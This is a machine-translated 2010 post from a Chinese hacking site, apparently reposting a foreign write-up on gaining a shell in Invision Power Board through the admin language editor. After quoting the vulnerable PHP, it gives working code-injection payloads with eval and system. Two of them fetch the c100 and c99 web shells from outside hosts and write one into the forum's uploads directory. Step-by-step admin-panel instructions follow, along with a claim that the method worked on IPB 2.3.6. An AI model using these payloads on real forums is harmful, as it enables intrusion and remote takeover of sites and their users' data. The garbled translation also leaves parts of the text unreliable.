IP. Board to take the SHELL summary-vulnerability warning-the black bar safety net

2010-01-17T00:00:00
ID MYHACK58:62201025958
Type myhack58
Reporter 佚名
Modified 2010-01-17T00:00:00

Description

Find domestic little discussion in this regard from a foreign Station reproduces some summary together

<http://mgsdl.free.fr/?0:18>

Which of the 6 methods

VI - CODE EXECUTION

The ACP allows admins to manage languages, they can choose the default language, import a new one, and edit them. Let's take a look in the file "sources/action_admin/ languages.php":

6 5| switch($this->ipsclass->input['code']) 6 6| { ..| 8 8| case 'doedit': 8 9| $this->ipsclass->admin->cp_permission_check(...); 9 0| $this->save_langfile(); 1 1 0| break; ...| 9 3 5| function save_langfile() 9 3 6| { ...| 9 5 7| $lang_file = CACHE_PATH."cache/lang_cache/".$ row['ldir']. ...| "/".$ this->ipsclass->input['lang_file']; 9 5 8| 9 5 9| if (! file_exists( $lang_file ) ) ... ...| 9 6 3| 9 6 4| if (! is_writeable( $lang_file ) ) ... ...| 9 6 9| $barney = array(); 9 7 0| 9 7 1| foreach ($this->ipsclass->input as $k => $v) 9 7 2| { 9 7 3| if ( preg_match( "/^XX_(\S+)$/", $k, $match ) ) 9 7 4| { 9 7 5| if ( isset($this->ipsclass->input[ $match[0] ]) ) 9 7 6| { 9 7 7| $v = str_replace("'", "'", stripslashes($_POST[$match[0]])); 9 7 8| $v = str_replace("<", "<", $v ); 9 7 9| $v = str_replace(">", ">", $v ); 9 8 0| $v = str_replace("&", "&", $v ); 9 8 1| $v = str_replace("\r", "", $v ); 9 8 2| 9 8 3| $barney[ $match[1] ] = $v; 9 8 4| } 9 8 5| } 9 8 6| }

As you can see, there's several replacements which are made. Some HTML entities are converted to their applicable characters. The "stripslashes()" function is also called. But we don't really care about that, this will not cause a problem, this was just to show you how user's inputs are treated. Now let's see how the change is made:

9 9 3| $start = "<? php\n\n".'$ lang = array('."\ n"; 9 9 4| 9 9 5| foreach($barney as $key => $text) 9 9 6| { 9 9 7| $text = preg_replace("/\n{1,}$/", "", $text); 9 9 8| $start .= "\n'".$ key."' => \"". str_replace( '"', '\"', $text)."\","; 9 9 9| } 1 0 0 0| 1 0 0 1| $start .= "\n\n);\n\n?"."& gt;"; 1 0 0 2| 1 0 0 3| if ($fh = fopen( $lang_file, 'w') ) 1 0 0 4| { 1 0 0 5| fwrite($fh, $start ); 1 0 0 6| fclose($fh); 1 0 0 7| }

So, there's a protection against double quotes, not all escape characters. There are several ways to bypass this protection.

The first method, is to play with what we call "dynamic variables". With two $, we can execute PHP code. Example: ${${@eval($_SERVER[HTTP_SH])}}

The second one, is to use another escape character, a backslash (\) will do the stuff. The attacker must change two inputs. Example:

First input: hello\ Second input: ); @eval($_SERVER[HTTP_SH]); /*

Use

| The Code:

VI - CODE EXECUTION

The ACP allows admins to manage languages, they can choose the default language, import a new one, and edit them. Let's take a look in the file "sources/action_admin/ languages.php": ...

This trick is working even against the current IPB version! Just go to admin - >Look and Feel - >Manage Languages

Then choose a section, for example: public_help

Edit "help_txt", which originally is "Choose a topic from the list, or search for a topic"

Add some php code, so it becomes as:

The Code:

Choose a topic from the list, or search for a topic

${${phpinfo()}}

Save the changes. Then go to the help section:

http://localhost/ipb.3.0.0.rc2/index.php?app=core&module=help

... and the php code will be executed

or code:

${${phpinfo()}} .......

${${system(wget http://blacknite.eu/php_shells/c100.txt)}}

and or:

read conf_global.php from the admin panel using basic admin privilege

The Code:

$linky="http://www.evilc0der.com/c99.txt"; $saved="/home/path/towhatever/forum/uploads/shell.php"; $from=fopen("$linky","r"); $to=fopen("$saved","w"); while(! feof($from)){ $string=fgets($from,4 0 9 6); fputs($to,$string); } fclose($to); fclose($from);

You want to know the path it must also be a ROOT ADMIN

i tested this the shell upload on IPB 2.3.6 and all was good --------------------------------------

forums/cache/lang_cache/en/lang_help.php

forums/uploads/